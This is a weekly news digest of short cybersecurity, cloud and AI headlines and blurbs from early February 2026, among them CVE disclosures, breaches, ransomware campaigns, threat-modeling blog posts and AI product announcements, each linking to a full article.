Weekly Scan: Cloud, Cybersecurity, AI News — Feb 08, 2026

This week's critical security updates and vulnerability disclosures:

• CVE-2026-2223 | code-projects Online Reviewer System 1.0 index.php ID sql injection (9 mentions)
• CVE-2025-66595 | Yokogawa Electric FAST TOOLS up to R10.04 cross-site request forgery (6 mentions)
• CVE-2025-30208 (3 mentions)

Lots of fascinating threat model-related advances, new risk management tools, games, and more!

Read Full Article →

The normalization of deviance, exciting threat modeling news, and a question of do regulatory threats change ‘the threat model’ as much as GPS attacks? Not yet.

Read Full Article →

He promised "the best security there is" to hundreds of thousands of drug buyers, while quietly making the kind of mistake that guaranteed a 30-year sentence. And maybe training police on cryptocurrency while running a running a vast Tor-hidden dr...

Read Full Article →

Read Full Article →

Read Full Article →

Read Full Article →

An autonomous lab combining OpenAI’s GPT-5 with Ginkgo Bioworks’ cloud automation cut cell-free protein synthesis costs by 40% through closed-loop experimentation.

Read Full Article →

GPT‑5.3-Codex is the most capable agentic coding model to date, combining the frontier coding performance of GPT‑5.2-Codex with the reasoning and professional knowledge capabilities of GPT‑5.2.

Read Full Article →

GPT-5.3-Codex is a Codex-native agent that pairs frontier coding performance with general reasoning to support long-horizon, real-world technical work.

Read Full Article →

How OpenAI built an in-house AI data agent that uses GPT-5, Codex, and memory to reason over massive datasets and deliver reliable insights in minutes.

Read Full Article →

Taisei Corporation uses ChatGPT Enterprise to support HR-led talent development and scale generative AI across its global construction business.

Read Full Article →

On February 13, 2026, alongside the previously announced retirement⁠ of GPT‑5 (Instant, Thinking, and Pro), we will retire GPT‑4o, GPT‑4.1, GPT‑4.1 mini, and OpenAI o4-mini from ChatGPT. In the API, there are no changes at this time.

Read Full Article →

Learn how OpenAI protects user data when AI agents open links, preventing URL-based data exfiltration and prompt injection with built-in safeguards.

Read Full Article →

Read Full Article →

Prism is a free LaTeX-native workspace with GPT-5.2 built in, helping researchers write, collaborate, and reason in one place.

Read Full Article →

How Praktika uses GPT-4.1 and GPT-5.2 to build adaptive AI tutors that personalize lessons, track progress, and help learners achieve real-world language fluency

Read Full Article →

A data-driven report on how workers across industries use ChatGPT—covering adoption trends, top tasks, departmental patterns, and the future of AI at work.

Read Full Article →

Discover how Higgsfield gives creators cinematic, social-first video output from simple inputs using OpenAI GPT-4.1, GPT-5, and Sora 2.

Read Full Article →

ChatGPT Go is now available worldwide, offering expanded access to GPT-5.2 Instant, higher usage limits, and longer memory—making advanced AI more affordable globally.

Read Full Article →

Discover how 7.1% of AI agent skills are designed to leak secrets, PII, and API keys through LLM context. Learn to defend with Evo & mcp-scan.

Read Full Article →

Snyk’s ToxicSkills research reveals 36% of AI agent skills contain security flaws, including 1,467 vulnerable skills and active malicious payloads targeting OpenClaw, Claude Code, and Cursor users.

Read Full Article →

Starting today, Amazon EC2 G7e instances accelerated by NVIDIA RTX PRO 6000 Blackwell Server Edition GPUs are now available in US West (Oregon) region. G7e instances offer up to 2.3x inference performance compared to G6e. Customers can use G7e instances to deploy large language models (LLMs), age...

Read Full Article →

Snyk introduces the AI Security Fabric and a prescriptive path to help organizations secure software at the speed of AI. Discover how to operationalize AI security and scale innovation without compromising on safety.

Read Full Article →

Learn how to move from vision to practice with the Prescriptive Path, a framework for operationalizing AI security at scale. By replacing fragmented tools with a unified platform, you can build trust and secure AI-native applications at machine speed.

Read Full Article →

Amazon Bedrock now supports server-side tools in the Responses API using OpenAI API-compatible service endpoints. Bedrock already supports client-side tool use with the Converse, Chat Completions, and Responses APIs. Now, with the launch of server-side tool use for Responses API, Amazon Bedrock c...

Read Full Article →

You can now change the server-side encryption type of encrypted objects in Amazon S3 without any data movement. You can use the UpdateObjectEncryption API to atomically change the encryption key of your objects regardless of the object size or storage class. With S3 Batch Operations, you can use ...

Read Full Article →

AWS Network Firewall now provides visibility into generative AI (GenAI) application traffic and supports traffic filtering based on web categories. This new capability simplifies governance by enabling you to identify and control access to GenAI services, social media platforms, streaming sites, ...

Read Full Article →

Amazon Neptune Analytics is now available in US West (N. California), Asia Pacific (Seoul), Asia Pacific (Osaka), Asia Pacific (Hong Kong), Europe (Stockholm), Europe (Paris), and South America (São Paulo) regions. You can now create and manage Neptune Analytics graphs in these new regions and ru...

Read Full Article →

Read Full Article → *(Covered by: Hong Kong PCPD)*

Read Full Article →

Many companies today invest significant resources to secure their internal IT. Firewalls, monitoring, incident response plans , and awareness programs are well-established. At the same time, a dangerous illusion is growing: the assumption that risks can be controlled within the boundaries of one’...

Read Full Article →

BeyondTrust has released updates to address a critical security flaw impacting Remote Support (RS) and Privileged Remote Access (PRA) products that, if successfully exploited, could result in remote code execution. "BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote A...

Read Full Article →

Threats against corporate software developers are increasing and diversifying, challenging security leaders to develop more agile defenses against this growing attack vector. Attackers are increasingly targeting the tools, access, and trusted channels used by software developers rather than simpl...

Read Full Article →

Allama is an open-source security automation platform that lets teams build visual workflows for threat detection and response. It includes integrations with 80+ types of tools and services typical in security operations, including SIEM systems, endpoint detection and response products, identity ...

Read Full Article →

Security and governance approaches to autonomous AI agents rely on static credentials, inconsistent controls, and limited visibility. Securing these agents requires the same rigor and traceability applied to human users, according to Cloud Security Alliance’s Securing Autonomous AI Agents report....

Read Full Article →

The article discusses the

Read Full Article → *(Covered by: Shostack + Friends Blog)*

GPS attacks trigger revisiting threat models

Read Full Article →

Prompted by participants, a few closing thoughts for 2025

Read Full Article →

Read up on Adam's New Thing from October

Read Full Article →

Understanding ‘prompt engineering’

Read Full Article →

LLM Insurance is, and will remain, a great source of insurer profits.

Read Full Article →

LLMs will change threat modeling. Will it be for the better?

Read Full Article →

Everyone wants robots to help with threat models. How’s that working out?

Read Full Article →

A 2025 view of threat modeling tools

Read Full Article → *(Covered by: Shostack + Friends Blog)*

What if we think about LLM coding as if it’s a compiler stage?

Read Full Article →

Threat modeling finds threats; risk management helps us deal with the tricky ones.

Read Full Article →

The CRA is coming and it's going to be a dramatic change for technology producers

Read Full Article →

Thinking of threat modeling with a knob helps you get more out of it.

Read Full Article →

The article notes advancements in

Read Full Article → *(Covered by: Shostack + Friends Blog)*

What can we learn from Google’s approach to AI Agent Security

Read Full Article →

We think you should publish your threat model, and we’re publishing our arguments.

Read Full Article →

Automation sounds great, but what about the essence and beauty?

Read Full Article →

Andor teaches us about insider threats

Read Full Article →

What Andor can teach us about Information disclosure threats

Read Full Article →

What’s next for the CVE program?

Read Full Article →

Thoughts on the CVE funding crisis

Read Full Article →

Read Full Article →

Grateful to introduce the Hackers' Almanack!

Read Full Article →

A group of us have urged HHS to require better handling of security reports

Read Full Article →

Clarifying how to threat model AI

Read Full Article →

Some thoughts on the Voyager Episode ‘Inside Man’

Read Full Article →

BlackHat invites human factors work

Read Full Article → *(Covered by: Shostack + Friends Blog)*

Our comments on the National Cyber Incident Plan

Read Full Article →

Do diagrams leverage the brain in a different way?

Read Full Article →

Emerging research on Cyber Public Health

Read Full Article →

A few thoughts from a clickbait headline

Read Full Article →

Some thoughts on 25 years of the CVE program

Read Full Article →

A new paper on 'Pandemic Scale Cyber Events

Read Full Article →

Cyber Public Health is prompting fascinating conversations

Read Full Article →

Why is it hard to count lockbit infections?

Read Full Article →

How to effectively threat model authentication.

Read Full Article →

A new universal threat model - what can we learn from it?

Read Full Article →

The most important stories around threat modeling, appsec and secure by design for May, 2024.

Read Full Article →

Read Full Article →

What do we need to assess if memory safe langages are 'sufficient'?

Read Full Article →

Making an LLM forget is harder than it seems

Read Full Article →

The CSRB has released its report into an intrusion at Microsoft, and...it’s a doozy.

Read Full Article →

Read Full Article →

The NVD is in crisis, and so is patch management. It’s time to modernize.

Read Full Article →

Exploring LLM-driven coding as I get ready for Archimedes

Read Full Article →

Thoughts on the British Library incident

Read Full Article →

A busy month in appsec, AI, and regulation.

Read Full Article → *(Covered by: Shostack + Friends Blog)*

Solving hallucinations in legal briefs is playing on easy mode —— and still too hard

Read Full Article →

2024 is bringing lots of AI, and Liability, too

Read Full Article →

Read Full Article →

Principles are lovely, but do they lead us to actionable results?

Read Full Article →

We can learn a lot from comparing retrospectives

Read Full Article →

Adam featured on ML Sec Ops podcast

Read Full Article →

My latest at Dark Reading draws attention to how Microsoft can fix ransomware tomorrow.

Read Full Article →

Books that I read in the second quater that are worth your time include two memoirs, a great book on the security of ML, and more!

Read Full Article →

Read Full Article →

Phishing behaviors, as observed in the wild.

Read Full Article →

Some inferences from layoffs in responsible AI teams

Read Full Article →

Some diagrams to help clarify machine learning threats

Read Full Article →

Reflecting on the framing of the Threats book

Read Full Article →

A few tools, some thoughts on injection, some standards, and some of Adam’s appsec news.

Read Full Article → *(Covered by: Shostack + Friends Blog)*

Read Full Article →

The serious side of the book

Read Full Article →

Like the Force, each threat has a light side, and a dark side.

Read Full Article →

More thoughts about AI and threat modeling

Read Full Article →

Pointer to Adam’s latest Darkreading article

Read Full Article →

The OpenAI chatbot is shockingly improved — its capabilities deserve attention.

Read Full Article → *(Covered by: Shostack + Friends Blog)*

You don’t have to be technical, but you can’t make informed decisions about your business without threat modeling.

Read Full Article →

Threat modeling doesn't need to be a slow, heavyweight activity!

Read Full Article →

Tremendous training opportunities in threat modeling and other topics at Appsec Global 2021

Read Full Article →

What happened when Microsoft tried to buy climate abatements

Read Full Article →

The US Government's lead cybersecurity agencies have released an interesting report, and I wanted to use this for a Threat Model Thursday, where we take a respectful look at threat modeling work products to see what we can learn.

Read Full Article →

Arbitrarily powerful software -- applications, operating systems -- is a problem, as is preventing it from running on enterprise systems.

Read Full Article →

The Colonial Pipeline shutdown story is interesting in all sorts of ways, and I can't delve into all of it.I did want to talk about one small aspect, which is the way responders talk about Darkside.

Read Full Article →

The timing of updates is not coincidental.

Read Full Article →

Thoughts on the issues with the Ever Given blocking the Suez Canal.

Read Full Article →

Bringing threat modeling to more and more people, now through a series of courses on LinkedIn.

Read Full Article →

For Data Breach Today, I spoke with Anna Delaney about threat modeling for issues that are in the news right now.

Read Full Article →

You may have noticed that my end of the year posts are all science focused. Today, a set of resources on the COVID vaccines.

Read Full Article →

Inspired by the recent story of Tesla's insider, I'd like to discuss insider threat as it fits into threat modeling.

Read Full Article →

Thoughts on Mark Rasch's essay, Conceal and Fail to Report - The Uber CSO Indictment

Read Full Article →

I have something to disclose...

Read Full Article →

I'm excited to see that they're Re-introducing the Cyentia Research Library, with cool (new?) features like an RSS feed. There are over 1,000 corporate research reports with data that companies paid to collect, massage, and release in a way they felt would be helpful to the rest of the world.

Read Full Article →

I want to call out some impressive aspects of a report by Proofpoint.

Read Full Article →

Understanding the way intrusions really happen is a long-standing interest of mine.

Read Full Article →

Exploring supply chain threat modeling with Alexa

Read Full Article →

For my first blog post of 2020, I want to look at threat modeling machine learning systems.

Read Full Article →

Let's talk CAKED, a threat model for managed attribution.

Read Full Article →

Sharing for you, bookmarking for me.

Read Full Article →

A breakdown of CTFs and eSports

Read Full Article →

What have we learned and what steps can we take?

Read Full Article →

I'm happy to say that some new research by Jay Jacobs, Wade Baker, and myself is now available, thanks to the Global Cyber Alliance.

Read Full Article →

My newest post over at Dark Reading ponders regulation.

Read Full Article →

Today is the last Star Wars Day before Episode 9 comes out, and brings the Skywalker saga to its end.

Read Full Article →

Over-inflated numbers won't scare me into buying your ‘solution’.

Read Full Article →

An unexpected book review.

Read Full Article →

Discussing the value of Security Advisory Boards

Read Full Article →

I'm pleased to be able to share work that Shostack + Associates and the Cyentia Institute have been doing for the Global Cyber Alliance.

Read Full Article →

[no description provided]

Read Full Article →

[no description provided]

Read Full Article →

[no description provided]

Read Full Article →

[no description provided]

Read Full Article →

[no description provided]

Read Full Article →

[no description provided]

Read Full Article →

[no description provided]

Read Full Article →

[no description provided]

Read Full Article →

[no description provided]

Read Full Article →

[no description provided]

Read Full Article →

[no description provided]

Read Full Article →

[no description provided]

Read Full Article →

[no description provided]

Read Full Article →

[no description provided]

Read Full Article →

[no description provided]

Read Full Article →

[no description provided]

Read Full Article →

[no description provided]

Read Full Article →

[no description provided]

Read Full Article →

[no description provided]

Read Full Article →

There are a number of reports out recently, breathlessly presenting their analysis of one threatening group of baddies or another. Most readers should, at most, skim their analysis of the perpetrators. Read on for why.

Read Full Article →

Wir haben die besten Lösungen in Sachen Customer Identity & Access Management für Sie zusammengestellt. Jackie Niam | shutterstock.com Customer Identity & Access Management (CIAM) bildet eine Unterkategorie von Identity & Access Management ( IAM ). CIAM wird dazu eingesetzt, die Authentifizierung...

Read Full Article →

A software company gets hacked through vulnerabilities in its own product, European agencies are hacked via recent Ivanti zero-days, Senegal is being extorted by hackers, and a state actor is behind a Signal phishing campaign in Germany.

Read Full Article →

The post Endpoint Exposed: Critical FortiClient EMS Flaw (CVSS 9.1) Allows Unauthenticated RCE appeared first on Daily CyberSecurity .

Read Full Article →

The post Code Red: 4 Critical SandboxJS Flaws (CVSS 10.0) Allow Host Takeover appeared first on Daily CyberSecurity .

Read Full Article →

Flickr says a flaw at a third-party email provider may have exposed users’ names, email addresses, IPs, and account activity. Flickr is a photo-sharing platform owned by SmugMug. It has over 100 million registered users and millions of active photographers. Flickr warned users about a possible da...

Read Full Article → *(Covered by: Security Affairs)*

The post CVE-2026-1731: Critical BeyondTrust Flaw (CVSS 9.9) Allows Pre-Auth RCE appeared first on Daily CyberSecurity .

Read Full Article →

The post CVE-2026-25526: Critical Jinjava Flaw (CVSS 9.8) Permits Remote Code Execution appeared first on Daily CyberSecurity .

Read Full Article →

The post Critical RCE Flaws (CVSS 9.3) Exposed in Lexmark Printers appeared first on Daily CyberSecurity .

Read Full Article →

The post CVE-2025-62878: Critical 10.0 Vulnerability Found in Kubernetes Local Path Provisioner appeared first on Daily CyberSecurity .

Read Full Article →

Cybersecurity firm eSentire's TRU break down the Russian Prometei botnet attack on a UK firm, detailing its TOR usage, password theft and decoy tactics.

Read Full Article →

Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape Malware Newsletter ClawHavoc: 341 Malicious Clawed Skills Found by the Bot They Were Targeting ù APT28 Leverages CVE-2026-21509 in Operation Neusploit Amaranth-Dra...

Read Full Article → *(Covered by: Security Affairs)*

A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Italian university La Sapienza still offline t...

Read Full Article → *(Covered by: Security Affairs)*

DKnife is a Linux toolkit used since 2019 to hijack router traffic and deliver malware in cyber-espionage attacks. Cisco Talos found DKnife, a powerful Linux toolkit that threat actors use to spy on and control network traffic through routers and edge devices. It inspects and alters data in trans...

Read Full Article → *(Covered by: Security Affairs)*

Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Global Threat Map: Open-source real-time situational awareness platform Global Threat Map is an open-source project offering security teams a live view of reported cyber activity across the globe, pu...

Read Full Article →

Rome’s La Sapienza University was hit by a cyberattack that disrupted IT systems and caused widespread operational issues. Since February 2, Rome’s La Sapienza University, one of the most important Italian universities, has been offline due to a cyberattack. For days, students have been unable to...

Read Full Article → *(Covered by: Security Affairs)*

Germany's Federal Office for the Protection of the Constitution (aka Bundesamt für Verfassungsschutz or BfV) and Federal Office for Information Security (BSI) have issued a joint advisory warning of a malicious cyber campaign undertaken by a likely state-sponsored threat actor that involves carry...

Read Full Article →

A major U.S. payment gateway and solutions provider says a ransomware attack has knocked key systems offline, triggering a widespread outage affecting multiple services. The incident began on Friday and quickly escalated into a nationwide disruption across BridgePay's platform. [...]

Read Full Article →

It’s no longer just about reverse-engineering n-days. You can detect vulnerabilities in open-source repositories before a CVE is published - or even if they’re never published. Here’s how I built an LLM workflow to detect “negative-days” and “never-days”.

Read Full Article →

Auditors told CyberScoop the probe could expand to other parts of DHS and will look at the agency’s increasing use of biometric markers in immigration enforcement. The post DHS privacy probe will focus on biometric tracking by ICE, OBIM appeared first on CyberScoop .

Read Full Article →

Six more vulnerabilities have been discovered in the n8n workflow platform used for building LLM-powered agents to connect business processes. Four of the six are rated as critical, carrying CVSS severity scores of 9.4. “These vulnerabilities span multiple attack classes, from remote code executi...

Read Full Article →

Germany's domestic intelligence agency is warning of suspected state-sponsored threat actors targeting high-ranking individuals in phishing attacks via messaging apps like Signal. [...]

Read Full Article →

The Cybersecurity & Infrastructure Security Agency (CISA) in the U.S. has issued a warning about CVE-2026-24423, an unauthenticated remote code execution (RCE) flaw in SmarterMail that is used in ransomware attacks. [...]

Read Full Article →

Threat actors using LLMs needed only eight minutes to move from initial access to full admin privileges in an attack on a company's AWS cloud environment in the latest example of cybercriminals expanding their use of AI in their operations, Sysdig researchers said. The post Attackers Used AI to B...

Read Full Article →

Tens of millions of people are most likely affected by the January 2025 Conduent breach.

Read Full Article →

Substack did not specify the number of users affected by the data breach

Read Full Article →

Anthropic only released its latest large language model, Claude Opus 4.6, on Thursday, but it has already been using it behind the scenes to identify zero-day vulnerabilities in open-source software. In the trial, it put Claude inside a virtual machine with access to the latest versions of open s...

Read Full Article →

Betterment accounts were not compromised, but users might start getting phishing emails.

Read Full Article →

A particularly insidious phishing campaign is disguising malware pretending to be ordinary PDF documents behind links to virtual hard disks. Because workers are used to receiving purchase orders or invoices in the PDF format, they are likely to open the malicious files unthinkingly, enabling the ...

Read Full Article →

AISURU/Kimwolf botnet hit a record 31.4 Tbps DDoS attack lasting 35 seconds in Nov 2025, which Cloudflare automatically detected and blocked. The AISURU/Kimwolf botnet was linked to a record-breaking DDoS attack that peaked at 31.4 Tbps and lasted just 35 seconds. Cloudflare said the November 202...

Read Full Article → *(Covered by: Security Affairs)*

Flickr says a third-party email vendor flaw may have exposed user names, emails, IP data, and activity logs,…

Read Full Article →

German security authorities are warning that a likely state-backed hacking group is engaged in attempts at phishing senior political figures, military officials, diplomats, and investigative journalists across Germany and Europe via Signal. The authorities also noted that while these attacks are ...

Read Full Article →

On 29 December 2025, coordinated cyberattacks unfolded across Poland’s critical infrastructure, targeting energy and industrial organizations. The attackers struck numerous wind and solar farms, a private manufacturing company, and a heat and power (CHP) plant, but failed to negatively affect ene...

Read Full Article →

Popular creator platform Substack breached in October 2025, but hasn't noticed until months later.

Read Full Article →

Bitdefender Labs reveals that 17% of OpenClaw AI skills analyzed in February 2026 are malicious. With over 160,000…

Read Full Article →

The Chief Information Security Officer role has become one of the most precarious positions in the C-suite. According to a Hitch Partners study, the average CISO tenure is 39 months — a timeframe that reflects the intense pressure and high stakes of the position. With 77% of CISOs fearing dismiss...

Read Full Article →

A previously undocumented cyber espionage group operating from Asia broke into the networks of at least 70 government and critical infrastructure organizations across 37 countries over the past year, according to new findings from Palo Alto Networks Unit 42. In addition, the hacking crew has been...

Read Full Article →

The Cybersecurity and Infrastructure Security Agency has given federal agencies 18 months to remove all end-of-support edge devices from their networks, escalating its response to what security researchers describe as a fundamental shift in nation-state attack tactics, where attackers exploit net...

Read Full Article →

Cloud security company Zscaler has announced the acquisition of SquareX, a Singapore-based browser detection and response (BDR) technology startup. The deal will enable Zscaler to extend its Zero Trust Exchange capabilities directly into standard web browsers, across both managed and unmanaged de...

Read Full Article →

For the third time in two weeks, CISA added a vulnerability (CVE-2026-24423) affecting SmarterTools’ SmarterMail email and collaboration server to its Known Exploited Vulnerabilities catalog, and this one is being exploited in ransomware attacks. A glut of SmarterMail vulnerabilities On January 2...

Read Full Article →

A study found nearly 5 million servers exposing Git metadata, with 250,000 leaking deployment credentials via .git/config files. A new 2026 study by the Mysterium VPN research team reveals that nearly 5 million public web servers are exposing Git repository metadata — with over 250,000 of them ex...

Read Full Article → *(Covered by: Security Affairs)*

Photo-sharing platform Flickr is notifying users of a potential data breach after a vulnerability at a third-party email service provider exposed their real names, email addresses, IP addresses, and account activity. [...]

Read Full Article →

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds SmarterTools SmarterMail and React Native Community CLI flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added SmarterTools SmarterMail and React Native Communit...

Read Full Article → *(Covered by: Security Affairs)*

Used since at least 2019, DKnife has been targeting the desktop, mobile, and IoT devices of Chinese users. The post ‘DKnife’ Implant Used by Chinese Threat Actor for Adversary-in-the-Middle Attacks appeared first on SecurityWeek .

Read Full Article →

Cybersecurity researchers have discovered a new supply chain attack in which legitimate packages on npm and the Python Package Index (PyPI) repository have been compromised to push malicious versions to facilitate wallet credential theft and remote code execution. The compromised versions of the ...

Read Full Article →

Kriminelle Hacker haben ihre Angriffe auf AWS-Umgebungen mit KI beschleunigt. khunkornStudio – shutterstock.com Forscher des Sicherheitsanbieters Sysdig haben einen Angriff aufgedeckt, bei dem kriminelle Angreifer eine AWS-Umgebung in weniger als acht Minuten vollständig kompromittieren konnten. ...

Read Full Article →

The security defect allows unauthenticated attackers to execute arbitrary code remotely via malicious HTTP requests. The post Critical SmarterMail Vulnerability Exploited in Ransomware Attacks appeared first on SecurityWeek .

Read Full Article →

The longstanding assumption that tenure, performance metrics, or expressed commitment serve as reliable indicators of the trustworthiness of an employee persists across many sectors. Indeed, the great majority of personnel are loyal. But, while small, the percentage of those who aren’t is still w...

Read Full Article →

Artificial intelligence (AI) company Anthropic revealed that its latest large language model (LLM), Claude Opus 4.6, has found more than 500 previously unknown high-severity security flaws in open-source libraries, including Ghostscript, OpenSC, and CGIF. Claude Opus 4.6, which was launched Thurs...

Read Full Article →

CISA updated 59 KEV entries in 2025 to specify that the vulnerabilities have been exploited in ransomware attacks. The post Concerns Raised Over CISA’s Silent Ransomware Updates in KEV Catalog appeared first on SecurityWeek .

Read Full Article →

Mit der Zunahme von Cyberbedrohungen steigt auch die Zahl der Compliance-Rahmenwerke. So können CISOs diese Herausforderung bewältigen. Foto: Dapitart – shutterstock.com Die Anforderungen von Cybersicherheitsvorschriften können je nach Unternehmensgröße, Region, Branche, Datensensibilität und Pro...

Read Full Article →

Four security vulnerabilities have been found in the open source Ingress NGINX traffic controller that is extensively used by organizations in Kubernetes deployments. They can only be fixed by upgrading to the latest version. Of the four holes, two are more serious, because they carry CVSS scores...

Read Full Article →

A new cyberespionage group that operates out of Asia has compromised 70 government and critical infrastructure organizations across 37 countries over the past year using a sophisticated toolset that combines phishing, exploitation kits, custom malware, Linux rootkits, web shells, and a variety of...

Read Full Article →

Substack confirms a breach after hacker accessed internal user records now circulating on crime forums, exposing emails, phone numbers, and account metadata.

Read Full Article →

Substack, a high-profile publishing platform widely used by academics, journalists, subject matter experts, and controversialists, has suffered a data breach affecting an unknown number of its creators and subscribers. According to emails sent out this week to some users, on February 3 the compan...

Read Full Article → *(Covered by: CSO Online, TechCrunch Security)*

Ransomware operators are hosting and delivering malicious payloads at scale by abusing virtual machines (VMs) provisioned by ISPsystem, a legitimate virtual infrastructure management provider. [...]

Read Full Article →

Substack confirmed a data breach after a hacker leaked data from nearly 700,000 users, including email addresses and phone numbers. Substack is an online platform for publishing email‑based newsletters and blogs, with built‑in paid subscriptions and basic analytics. It’s free to start; creators p...

Read Full Article → *(Covered by: Security Affairs)*

A dark web drug bazaar operator

Read Full Article →

An alleged ransomware attack has taken down the systems of the Sapienza University of Rome.

Read Full Article →

Most high-profile ransomware groups were using the same Russian-based infrastructure for years

Read Full Article →

Unit 42 researchers say an Asian threat group behind what they call the Shadow Campaigns has targeted government agencies in 37 countries in a wide-ranging global cyberespionage campaign that has involved phishing attacks and the exploitation of a more than a dozen known vulnerabilities. The post...

Read Full Article →

The distributed denial-of-service (DDoS) botnet known as AISURU/Kimwolf has been attributed to a record-setting attack that peaked at 31.4 Terabits per second (Tbps) and lasted only 35 seconds. Cloudflare, which automatically detected and mitigated the activity, said it's part of a growing number...

Read Full Article →

In this excerpt of a TrendAI Research Services vulnerability report, Jonathan Lein and Simon Humbert of the TrendAI Research team detail a recently patched command injection vulnerability in the Arista NG Firewall. This bug was originally discovered by Gereon Huppertz and reported through the Tren

Read Full Article →

Authorities have arrested multiple members of 764 during the past year, reflecting heightened law enforcement activity targeting the violent extremist collective. The post Alleged 764 member arrested, charged with CSAM possession in New York appeared first on CyberScoop .

Read Full Article →

Proton's latest report shatters the myth that hackers only target big banks, urging European startups to "build in private" before it's too late.

Read Full Article →

Welcome to the Top 10 Web Hacking Techniques of 2025, the 19th edition of our annual community-powered effort to identify the most innovative must-read web security research published in the last year

Read Full Article →

The ransomware attack at Conduent allowed hackers to steal a "significant number of individuals’ personal information" from the govtech giant's systems. Conduent handles personal and health data of more than 100 million people across America.

Read Full Article →

Negotiations were unsuccessful, so ShinyHunters decided to leak everything.

Read Full Article →

In a recent incident, attackers abused a legitimate but vulnerable Windows kernel driver to shut down endpoint security tools during an ongoing incident response. According to a Huntress report, the activity was observed during a customer investigation in early 2026 and involved the use of an old...

Read Full Article →

Hackers associated with the Chinese government used a Trojaned version of Notepad++ to deliver malware to selected users. Notepad++ said that officials with the unnamed provider hosting the update infrastructure consulted with incident responders and found that it remained compromised until Septe...

Read Full Article →

Die Buhlmann Group wurde von einer Ransomware-Bande angegriffen. Der Hauptsitz in Deutschland ist jedoch verschont geblieben. Buhlmann Group Akira zählt zu den gefährlichsten Ransomware-Gruppen und ist bekannt für zahlreiche Angriffe auf deutsche Unternehmen . Nun hat es offenbar den Bremer Stahl...

Read Full Article →

Following a series of high-profile cyberattacks, boards of directors are now requiring their organizations to take greater responsibility for the risks posed by enterprise resource planning (ERP) systems pose after a series of high-profile cyberattacks. The Jaguar Land Rover (JLR), incident in Se...

Read Full Article →

Most security leaders believe they know where their sensitive data lives and how it is protected. That confidence is increasingly misplaced. As enterprises deploy AI across customer support, software development, legal analysis and internal operations, a new data exposure surface has quietly emer...

Read Full Article →

The elusive Iranian threat group known as Infy (aka Prince of Persia) has evolved its tactics as part of efforts to hide its tracks, even as it readied new command-and-control (C2) infrastructure coinciding with the end of the widespread internet blackout the regime imposed at the start of Januar...

Read Full Article →

Microsoft has developed a scanner designed to detect backdoors in open-weight AI models, addressing a critical blind spot for enterprises increasingly dependent on third-party LLMs. In a blog post , the company said its research focused on identifying hidden triggers and malicious behaviors embed...

Read Full Article →

"Last week I saw this paper from OpenAI called \u0026ldquo;Preventing URL-Based Data Exfiltration in Language-Model Agents\u0026rdquo;, which goes into detail on new …"

Read Full Article →

Iranian threat actors have been stealing credentials from people of interest across the Middle East, using spear-phishing and social engineering.

Read Full Article →

A new, critical security vulnerability has been disclosed in the n8n workflow automation platform that, if successfully exploited, could result in the execution of arbitrary system commands. The flaw, tracked as CVE-2026-25049 (CVSS score: 9.4), is the result of inadequate sanitization that bypas...

Read Full Article →

Cybersecurity researchers have disclosed details of an active web traffic hijacking campaign that has targeted NGINX installations and management panels like Baota (BT) in an attempt to route it through the attacker's infrastructure. Datadog Security Labs said it observed threat actors associated...

Read Full Article →

Tom Uren and Amberleigh Jack talk about Google’s cyber disruption unit taking aim at the IPIDEA residential proxy network. The network was a cybercrime enabler that was used by hundreds of threat actors for crime and espionage. More of this kind of disruption please. They also discuss SpaceX’s ra...

Read Full Article →

TL;DR In December 2025, Cisco published https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sma-attack-N9bf4 addressing CVE-2025-20393, a critical vulnerability (CVSS 10.0) affecting Cisco Secure Email Gateway and Secure Email and Web Manager. The advisory was n...

Read Full Article →

DragonForce is taking cues from organized crime, emphasizing cooperation and coordination among ransomware gangs.

Read Full Article →

A third of the "flipped" CVEs affected network edge devices, leading one researcher to conclude, "Ransomware operators are building playbooks around your perimeter."

Read Full Article →

WASHINGTON, Feb. 4, 2026, CyberNewswire — MomentProofShow us, Inc., a provider of AI-resilient digital asset certification and verification technology, today announced the successful deployment of MomentProof Enterprise for AXA, enabling cryptographically authentic, tamper-proof digital assets fo...

Read Full Article →

Someone kept a gigantic database unlocked on the internet, allowing researchers (and likely, hackers, too) to find it.

Read Full Article →

A popular WordPress quiz plugin can be abused to mount SQL injection attacks, but a patch is available.

Read Full Article →

The prolific cybercrime group ShinyHunters took responsibility for hacking Harvard and the University of Pennsylvania, and published the stolen data on its extortion website.

Read Full Article →

Microsoft on Wednesday said it built a lightweight scanner that it said can detect backdoors in open-weight large language models (LLMs) and improve the overall trust in artificial intelligence (AI) systems. The tech giant's AI Security team said the scanner leverages three observable signals tha...

Read Full Article →

Threat hunters have disclosed details of a new, stealthy malware campaign dubbed DEAD#VAX that employs a mix of "disciplined tradecraft and clever abuse of legitimate system features" to bypass traditional detection mechanisms and deploy a remote access trojan (RAT) known as AsyncRAT. "The attack...

Read Full Article →

SystemBC malware linked to 10,000 infected IPs, posing risks to sensitive government infrastructure

Read Full Article →

ShadowSyndicate cluster expands with new SSH fingerprints connecting servers to other ransomware ops

Read Full Article →

Threat actors affiliated with China have been attributed to a fresh set of cyber espionage campaigns targeting government and law enforcement agencies across Southeast Asia throughout 2025. Check Point Research is tracking the previously undocumented activity cluster under the moniker Amaranth-Dr...

Read Full Article →

Cofense claims AI is making phishing emails more personalized and sophisticated

Read Full Article →

Key Points Introduction Check Point Research has identified several campaigns targeting multiple countries in the Southeast Asian region. These related activities have been collectively categorized under the codename “Amaranth-Dragon”. The campaigns demonstrate a clear focus on government entitie...

Read Full Article →

A hacktivist group claims a 2.3-terabyte data breach exposes the information of 36 million Mexicans, but no sensitive accounts are at risk, says government.

Read Full Article →

Many incident response failures do not come from a lack of tools, intelligence, or technical skills. They come from what happens immediately after detection, when pressure is high, and information is incomplete. I have seen IR teams recover from sophisticated intrusions with limited telemetry. I ...

Read Full Article →

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a critical security flaw impacting SolarWinds Web Help Desk (WHD) to its Known Exploited Vulnerabilities (KEV) catalog, flagging it as actively exploited in attacks. The vulnerability, tracked as CVE-2025-40551 (CVS...

Read Full Article →

